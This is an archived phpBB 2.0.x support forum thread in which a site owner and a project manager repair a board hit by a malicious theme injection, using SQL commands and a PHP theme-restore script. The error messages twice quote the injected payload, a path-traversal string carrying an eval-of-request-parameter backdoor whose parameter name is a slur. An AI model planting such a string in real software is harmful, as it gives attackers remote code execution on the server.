Repeated - Error 1054 - Sessions_admin - Help

This is an archive of the phpBB 2.0.x support forum. Support for phpBB2 has now ended.
Forum rules
Following phpBB2's EoL, this forum is now archived for reference purposes only.
Please see the following announcement for more information: viewtopic.php?f=14&t=1385785
Locked
yorktown
Registered User
Posts: 22
Joined: Fri Jun 18, 2004 8:19 am

Repeated - Error 1054 - Sessions_admin - Help

Post by yorktown »

I had a hacker with the 'nigga' script that stopped the database. My site is http://mb.idate2005.com


I am using PHP4 and MYSQL

I backed up the database (ver 2.0.15).

I uploaded the FULL VERSION of 2.0.17.

I restored the datbase using the command:
mysql -u USERNAME -p DATABASENAME < /PATH/TO/SAVEDFILENAME.SQL

I then ran http://mb.idate2005.com/install/update_to_latest.php

It worked and updated the database.

I deleted the INSTALL and CONTRIB Directories.

I am now getting this error REPEATEDLY:

------------------------------

phpBB : Critical Error

Error creating new session

DEBUG MODE

SQL Error : 1054 Unknown column 'session_admin' in 'field list'

INSERT INTO idate_sessions (session_id, session_user_id, session_start, session_time, session_ip, session_page, session_logged_in, session_admin) VALUES ('21435703a8c3d2d496a3d2a073779792', -1, 1128038756, 1128038756, 'c2e4c0c2', 0, 0, 0)

Line : 172
File : sessions.php

----------------------

I tried this over and over. I continue to get the error. I also tried this with the fixtables.php mod (that covers the 'nigga' hack script) after doing all of the above. Same error. Several tries.

Please help.
Last edited by yorktown on Fri Sep 30, 2005 12:20 am, edited 1 time in total.
User avatar
Marshalrusty
Project Manager
Project Manager
Posts: 29302
Joined: Mon Nov 22, 2004 10:45 pm
Location: New York City
Name: Yuriy Rusko
Contact:

Post by Marshalrusty »

This happens when a new version of the phpBB files is used with an old database. To update the database:
1) Upload the install folder to the root folder of your forum (the one with the folders 'admin', 'cache', 'db', 'includes', 'language', etc.)
2) Point to the file in your browser. (http://{your_domain}/{root_path}/install/update_to_latest.php)
3) Delete the install folder
Have comments/praise/complaints/suggestions? Please feel free to PM me.

Need private help? Hire me for all your phpBB and web development needs
yorktown
Registered User
Posts: 22
Joined: Fri Jun 18, 2004 8:19 am

Post by yorktown »

Did it... It did it 4 times. It is NOT working.

I read your post on other support threads (I do read before I post :-)

Help.

Thanks
User avatar
Marshalrusty
Project Manager
Project Manager
Posts: 29302
Joined: Mon Nov 22, 2004 10:45 pm
Location: New York City
Name: Yuriy Rusko
Contact:

Post by Marshalrusty »

Use phpMyAdmin to run:

Code: Select all

ALTER TABLE phpbb_sessions ADD COLUMN session_admin tinyint(2) DEFAULT '0' NOT NULL 
Have comments/praise/complaints/suggestions? Please feel free to PM me.

Need private help? Hire me for all your phpBB and web development needs
yorktown
Registered User
Posts: 22
Joined: Fri Jun 18, 2004 8:19 am

Post by yorktown »

OK.. Now I'm back to the hacker script:

----------------------
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 361
File : functions.php
-------------------

***I ran fixtables.php It updated the tables without a problem. I keep getting the error.
User avatar
Marshalrusty
Project Manager
Project Manager
Posts: 29302
Joined: Mon Nov 22, 2004 10:45 pm
Location: New York City
Name: Yuriy Rusko
Contact:

Post by Marshalrusty »

Look here for the fix.
Have comments/praise/complaints/suggestions? Please feel free to PM me.

Need private help? Hire me for all your phpBB and web development needs
yorktown
Registered User
Posts: 22
Joined: Fri Jun 18, 2004 8:19 am

Post by yorktown »

That's for a virus and a trojan horse. All the posts are about using the admin panel to find things. I can't even access my admin.

I keep getting the same error on any page you want to view:

----------------
phpBB : Critical Error

Could not open aaa=12;eval(stripslashes($_REQUEST[nigga]));exit();// /../../../../../../../../../../../../../../../../../../../tmp template config file

DEBUG MODE

Line : 361
File : functions.php
-----------------

Perhaps you gave me the wrong link?
User avatar
Marshalrusty
Project Manager
Project Manager
Posts: 29302
Joined: Mon Nov 22, 2004 10:45 pm
Location: New York City
Name: Yuriy Rusko
Contact:

Post by Marshalrusty »

Make a fix.php file with the following. Upload it to the root folder of your forum and run it by pointing to it with your browser. Then delete the file. Also delete the theme that you uploaded

Code: Select all

<?php

define('IN_PHPBB', true);

$phpbb_root_path = './';
include($phpbb_root_path . 'extension.inc');
include($phpbb_root_path . 'config.'.$phpEx);
include($phpbb_root_path . 'includes/constants.'.$phpEx);

echo '<h1>phpBB Template Error Fix</h1><BR><BR>';

if( !defined("PHPBB_INSTALLED") )
{
   echo 'Error: phpBB is not Installed!';
   die;
}

if( ($dbms != 'mysql') && ($dbms != 'mysql4') )
{
   echo 'Error: This Fix only works with a MySQL Database';
   die;
}

$db = mysql_connect($dbhost,$dbuser,$dbpasswd);

if(!$db)
{
   echo 'Error: Could not connect to the MySQL Server';
   die;
}

$dbs = mysql_select_db($dbname);

if(!$dbs)
{
   echo 'Error: Could not select Database';
   die;
}

$query = "INSERT INTO ".THEMES_TABLE." (themes_id, template_name, style_name, head_stylesheet, body_background, body_bgcolor, body_text, body_link, body_vlink, body_alink, body_hlink, tr_color1, tr_color2, tr_color3, tr_class1, tr_class2, tr_class3, th_color1, th_color2, th_color3, th_class1, th_class2, th_class3, td_color1, td_color2, td_color3, td_class1, td_class2, td_class3, fontface1, fontface2, fontface3, fontsize1, fontsize2, fontsize3, fontcolor1, fontcolor2, fontcolor3, span_class1, span_class2, span_class3) VALUES (NULL, 'subSilver', 'subSilver', 'subSilver.css', '', 'E5E5E5', '000000', '006699', '5493B4', '', 'DD6900', 'EFEFEF', 'DEE3E7', 'D1D7DC', '', '', '', '98AAB1', '006699', 'FFFFFF', 'cellpic1.gif', 'cellpic3.gif', 'cellpic2.jpg', 'FAFAFA', 'FFFFFF', '', 'row1', 'row2', '', 'Verdana, Arial, Helvetica, sans-serif', 'Trebuchet MS', 'Courier, \'Courier New\', sans-serif', 10, 11, 12, '444444', '006600', 'FFA34F', '', '', '')";
$result = mysql_query($query,$db);

echo 'Inserting New Theme Record: ';

if(!$result)
{
    echo '<font color="#FF0000">FAILED</font>';
    die;
}
else
{
   $theme_id = mysql_insert_id($db);
   
   echo '<font color="#009933">SUCCESS</font>';
}   

echo '<br>';

$query = "INSERT INTO ".THEMES_NAME_TABLE." (themes_id, tr_color1_name, tr_color2_name, tr_color3_name, tr_class1_name, tr_class2_name, tr_class3_name, th_color1_name, th_color2_name, th_color3_name, th_class1_name, th_class2_name, th_class3_name, td_color1_name, td_color2_name, td_color3_name, td_class1_name, td_class2_name, td_class3_name, fontface1_name, fontface2_name, fontface3_name, fontsize1_name, fontsize2_name, fontsize3_name, fontcolor1_name, fontcolor2_name, fontcolor3_name, span_class1_name, span_class2_name, span_class3_name) VALUES ('".$theme_id."', 'The lightest row colour', 'The medium row color', 'The darkest row colour', '', '', '', 'Border round the whole page', 'Outer table border', 'Inner table border', 'Silver gradient picture', 'Blue gradient picture', 'Fade-out gradient on index', 'Background for quote boxes', 'All white areas', '', 'Background for topic posts', '2nd background for topic posts', '', 'Main fonts', 'Additional topic title font', 'Form fonts', 'Smallest font size', 'Medium font size', 'Normal font size (post body etc)', 'Quote & copyright text', 'Code text colour', 'Main table header text colour', '', '', '')";

$result = mysql_query($query,$db);

echo 'Inserting Theme Names For Record: ';

if(!$result)
{
    echo '<font color="#FF0000">FAILED</font>';
}
else
{
   if(mysql_affected_rows($db)=='0')
   {
      echo '<font color="#999999">NAMES DATA ALREADY EXISTS</font>';
   }
   else
   {
      echo '<font color="#009933">SUCCESS</font>';
   }
}   

echo '<br>';

$query = "UPDATE ".CONFIG_TABLE." SET config_value = '1' WHERE config_name = 'override_user_style' LIMIT 1";
$result = mysql_query($query,$db);

echo 'Updating Override User Style: ';

if(!$result)
{
    echo '<font color="#FF0000">FAILED</font>';
}
else
{
   if(mysql_affected_rows($db)=='0')
   {
      echo '<font color="#999999">NOT UPDATED</font>';
   }
   else
   {
      echo '<font color="#009933">SUCCESS</font>';
   }
}

echo '<BR>';

$query = "UPDATE ".CONFIG_TABLE." SET config_value = '".$theme_id."' WHERE config_name = 'default_style' LIMIT 1";
$result = mysql_query($query,$db);

echo 'Changing Default Theme ID: ';

if(!$result)
{
    echo '<font color="#FF0000">FAILED</font>';
}
else
{
   if(mysql_affected_rows($db)=='0')
   {
      echo '<font color="#999999">NOT CHANGED</font>';
   }
   else
   {
      echo '<font color="#009933">SUCCESS</font>';
   }
}

echo '<BR><BR><b>Delete this File from your Server!</b><BR><BR>For any questions/problems about this script, please visit this <a href="http://www.phpbb.com/phpBB/viewtopic.php?t=29697">Page</a><BR><br>-phpBB Support Team';

die;

?>
Have comments/praise/complaints/suggestions? Please feel free to PM me.

Need private help? Hire me for all your phpBB and web development needs
yorktown
Registered User
Posts: 22
Joined: Fri Jun 18, 2004 8:19 am

Post by yorktown »

Found it:

Look here: http://www.phpbb.com/phpBB/viewtopic.php?t=272959

and here: http://www.phpbb.com/phpBB/viewtopic.ph ... ight=nigga

You need to do 2 things:

1 - Go into the MYSQL database

2 - Type:

select * from phpbb_themes;

3 - You will see the ../../../../../../../../ theme that is obviously the bad one. Note the theme_id (first number for the set). Also, note the theme_id for subSilver (probably '1')

4 - Type:
delete from phpbb_themes where theme_id='(the bad theme number)';

5 - Type:
UPDATE phpbb_config SET config_value="(the subsilver theme number)" where config_name="default_style";

That's it and it should work. Worked for me. Thanks for all your help Marshalrusty.
User avatar
Marshalrusty
Project Manager
Project Manager
Posts: 29302
Joined: Mon Nov 22, 2004 10:45 pm
Location: New York City
Name: Yuriy Rusko
Contact:

Post by Marshalrusty »

Glad you got it fixed :wink:
Have comments/praise/complaints/suggestions? Please feel free to PM me.

Need private help? Hire me for all your phpBB and web development needs
Locked

Return to “2.0.x Support Forum”